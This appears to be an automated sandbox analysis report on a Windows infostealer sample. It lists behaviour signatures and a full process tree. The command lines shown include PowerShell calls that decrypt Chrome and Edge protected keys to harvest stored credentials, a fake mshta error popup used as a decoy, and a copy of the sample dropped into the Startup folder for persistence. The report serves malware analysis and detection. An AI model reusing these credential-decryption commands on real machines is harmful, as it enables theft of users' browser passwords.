Edit tour
Windows
Analysis Report
SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe (PID: 1164 cmdline:
"C:\Users\ user\Deskt op\Securit eInfo.com. Generic.JS .Malicord. D.02514950 .1665.6783 .exe" MD5: B691AA17712DEA8153BDCAA3FFBDACA4) - Setup.exe (PID: 6204 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\2eFAGdf gANPOg197Y HkhBxawy9z \Setup.exe MD5: B2ED3FF866496C4DBC5873779AF2F7E9) - cmd.exe (PID: 3772 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5656 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - Setup.exe (PID: 4196 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2eFAGd fgANPOg197 YHkhBxawy9 z\Setup.ex e" --type= gpu-proces s --user-d ata-dir="C :\Users\us er\AppData \Roaming\S etup" --gp u-preferen ces=UAAAAA AAAADgAAAY AAAAAAAAAA AAAAAAAABg AAAAAAAwAA AAAAAAAAAA AAAQAAAAAA AAAAAAAAAA AAAAAAAAAE gAAAAAAAAA SAAAAAAAAA AYAAAAAgAA ABAAAAAAAA AAGAAAAAAA AAAQAAAAAA AAAAAAAAAO AAAAEAAAAA AAAAABAAAA DgAAAAgAAA AAAAAACAAA AAAAAAA= - -mojo-plat form-chann el-handle= 1636 --fie ld-trial-h andle=1840 ,i,8366561 8257251983 97,2739281 9237145387 64,131072 --disable- features=S pareRender erForSiteP erProcess, WinRetriev eSuggestio nsOnlyOnDe mand /pref etch:2 MD5: B2ED3FF866496C4DBC5873779AF2F7E9) - cmd.exe (PID: 1720 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 4204 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 2232 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,133,249, 150,31,215 ,133,122,7 4,160,83,2 00,231,85, 194,93,57, 16,0,0,0,2 8,0,0,0,71 ,0,111,0,1 11,0,103,0 ,108,0,101 ,0,32,0,67 ,0,104,0,1 14,0,111,0 ,109,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,220,9 9,52,70,20 3,13,214,2 37,172,78, 180,7,135, 132,222,56 ,192,222,6 0,122,2,71 ,120,79,2, 110,200,30 ,117,75,45 ,64,0,0,0, 0,14,128,0 ,0,0,2,0,0 ,32,0,0,0, 84,96,129, 36,148,225 ,154,120,7 4,75,125,1 56,249,147 ,149,248,2 5,11,154,2 23,250,69, 31,112,70, 8,1,93,107 ,120,136,2 24,48,0,0, 0,6,45,27, 130,158,22 7,72,112,4 6,16,20,24 7,121,185, 158,95,106 ,75,104,23 7,172,49,1 68,214,157 ,137,66,20 8,86,220,4 5,252,169, 85,86,184, 103,83,137 ,130,133,3 5,244,129, 44,127,163 ,72,64,0,0 ,0,35,18,1 09,136,80, 52,198,238 ,200,236,2 26,120,27, 146,160,17 4,71,84,66 ,203,39,16 9,215,160, 227,44,242 ,154,161,6 4,187,142, 165,157,66 ,1,229,116 ,228,177,2 36,99,223, 240,230,79 ,21,58,53, 251,1,129, 235,77,36, 48,152,174 ,95,142,72 ,93,217,72 ), $null, 'CurrentUs er')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4456 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,133,24 9,150,31,2 15,133,122 ,74,160,83 ,200,231,8 5,194,93,5 7,16,0,0,0 ,28,0,0,0, 71,0,111,0 ,111,0,103 ,0,108,0,1 01,0,32,0, 67,0,104,0 ,114,0,111 ,0,109,0,1 01,0,0,0,1 6,102,0,0, 0,1,0,0,32 ,0,0,0,220 ,99,52,70, 203,13,214 ,237,172,7 8,180,7,13 5,132,222, 56,192,222 ,60,122,2, 71,120,79, 2,110,200, 30,117,75, 45,64,0,0, 0,0,14,128 ,0,0,0,2,0 ,0,32,0,0, 0,84,96,12 9,36,148,2 25,154,120 ,74,75,125 ,156,249,1 47,149,248 ,25,11,154 ,223,250,6 9,31,112,7 0,8,1,93,1 07,120,136 ,224,48,0, 0,0,6,45,2 7,130,158, 227,72,112 ,46,16,20, 247,121,18 5,158,95,1 06,75,104, 237,172,49 ,168,214,1 57,137,66, 208,86,220 ,45,252,16 9,85,86,18 4,103,83,1 37,130,133 ,35,244,12 9,44,127,1 63,72,64,0 ,0,0,35,18 ,109,136,8 0,52,198,2 38,200,236 ,226,120,2 7,146,160, 174,71,84, 66,203,39, 169,215,16 0,227,44,2 42,154,161 ,64,187,14 2,165,157, 66,1,229,1 16,228,177 ,236,99,22 3,240,230, 79,21,58,5 3,251,1,12 9,235,77,3 6,48,152,1 74,95,142, 72,93,217, 72), $null , 'Current User') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 3536 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,133,249, 150,31,215 ,133,122,7 4,160,83,2 00,231,85, 194,93,57, 16,0,0,0,3 0,0,0,0,77 ,0,105,0,9 9,0,114,0, 111,0,115, 0,111,0,10 2,0,116,0, 32,0,69,0, 100,0,103, 0,101,0,0, 0,16,102,0 ,0,0,1,0,0 ,32,0,0,0, 14,53,24,1 03,59,147, 206,28,42, 108,2,171, 66,248,59, 252,178,16 2,35,232,1 27,115,109 ,155,94,76 ,82,107,20 3,163,4,19 7,0,0,0,0, 14,128,0,0 ,0,2,0,0,3 2,0,0,0,10 2,39,139,2 36,68,70,3 9,152,67,1 11,123,34, 177,197,10 3,181,124, 213,190,11 2,13,193,1 85,90,191, 194,52,69, 126,126,90 ,70,48,0,0 ,0,78,43,1 08,139,184 ,233,18,30 ,79,160,62 ,90,54,145 ,175,184,1 ,206,218,1 46,139,219 ,218,40,3, 209,83,56, 71,210,79, 189,120,17 4,46,157,1 01,81,201, 76,77,181, 151,119,46 ,253,183,1 46,64,0,0, 0,25,132,8 3,220,77,7 2,234,147, 112,233,19 2,145,190, 240,42,192 ,38,154,22 0,71,203,1 64,145,111 ,115,55,19 ,193,38,16 8,21,189,1 20,226,128 ,178,203,1 74,136,16, 121,184,13 3,15,28,24 7,227,66,0 ,254,38,11 2,15,247,1 7,81,12,63 ,142,85,32 ,243,79,25 1), $null, 'CurrentU ser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3840 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6000 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,133,24 9,150,31,2 15,133,122 ,74,160,83 ,200,231,8 5,194,93,5 7,16,0,0,0 ,30,0,0,0, 77,0,105,0 ,99,0,114, 0,111,0,11 5,0,111,0, 102,0,116, 0,32,0,69, 0,100,0,10 3,0,101,0, 0,0,16,102 ,0,0,0,1,0 ,0,32,0,0, 0,14,53,24 ,103,59,14 7,206,28,4 2,108,2,17 1,66,248,5 9,252,178, 162,35,232 ,127,115,1 09,155,94, 76,82,107, 203,163,4, 197,0,0,0, 0,14,128,0 ,0,0,2,0,0 ,32,0,0,0, 102,39,139 ,236,68,70 ,39,152,67 ,111,123,3 4,177,197, 103,181,12 4,213,190, 112,13,193 ,185,90,19 1,194,52,6 9,126,126, 90,70,48,0 ,0,0,78,43 ,108,139,1 84,233,18, 30,79,160, 62,90,54,1 45,175,184 ,1,206,218 ,146,139,2 19,218,40, 3,209,83,5 6,71,210,7 9,189,120, 174,46,157 ,101,81,20 1,76,77,18 1,151,119, 46,253,183 ,146,64,0, 0,0,25,132 ,83,220,77 ,72,234,14 7,112,233, 192,145,19 0,240,42,1 92,38,154, 220,71,203 ,164,145,1 11,115,55, 19,193,38, 168,21,189 ,120,226,1 28,178,203 ,174,136,1 6,121,184, 133,15,28, 247,227,66 ,0,254,38, 112,15,247 ,17,81,12, 63,142,85, 32,243,79, 251), $nul l, 'Curren tUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - Setup.exe (PID: 5564 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2eFAGd fgANPOg197 YHkhBxawy9 z\Setup.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --u ser-data-d ir="C:\Use rs\user\Ap pData\Roam ing\Setup" --mojo-pl atform-cha nnel-handl e=2076 --f ield-trial -handle=18 40,i,83665 6182572519 8397,27392 8192371453 8764,13107 2 --disabl e-features =SpareRend ererForSit ePerProces s,WinRetri eveSuggest ionsOnlyOn Demand /pr efetch:8 MD5: B2ED3FF866496C4DBC5873779AF2F7E9) - cmd.exe (PID: 5344 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "st art /B cmd /c mshta "javascrip t:new Acti veXObject( 'WScript.S hell').Pop up('An err or occurre d while do wnloading files. Ple ase try ag ain later. ', 0, 'Err or', 16);c lose()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6120 cmdline:
cmd /c msh ta "javasc ript:new A ctiveXObje ct('WScrip t.Shell'). Popup('An error occu rred while downloadi ng files. Please try again lat er.', 0, ' Error', 16 );close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - mshta.exe (PID: 3948 cmdline:
mshta "jav ascript:ne w ActiveXO bject('WSc ript.Shell ').Popup(' An error o ccurred wh ile downlo ading file s. Please try again later.', 0 , 'Error', 16);close ()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - Setup.exe (PID: 3364 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2eFAGd fgANPOg197 YHkhBxawy9 z\Setup.ex e" --type= gpu-proces s --disabl e-gpu-sand box --use- gl=disable d --gpu-ve ndor-id=51 40 --gpu-d evice-id=1 40 --gpu-s ub-system- id=0 --gpu -revision= 0 --gpu-dr iver-versi on=10.0.19 041.546 -- user-data- dir="C:\Us ers\user\A ppData\Roa ming\Setup " --gpu-pr eferences= UAAAAAAAAA DoAAAYAAAA AAAAAAAAAA AAAABgAAAA AAAwAAAAAA AAAAAAAACQ AAAAAAAAAA AAAAAAAAAA AAAAAEgAAA AAAAAASAAA AAAAAAAYAA AAAgAAABAA AAAAAAAAGA AAAAAAAAAQ AAAAAAAAAA AAAAAOAAAA EAAAAAAAAA ABAAAADgAA AAgAAAAAAA AACAAAAAAA AAA= --moj o-platform -channel-h andle=2480 --field-t rial-handl e=1840,i,8 3665618257 25198397,2 7392819237 14538764,1 31072 --di sable-feat ures=Spare RendererFo rSitePerPr ocess,WinR etrieveSug gestionsOn lyOnDemand /prefetch :2 MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- Setup.exe (PID: 6980 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\Set up.exe" MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |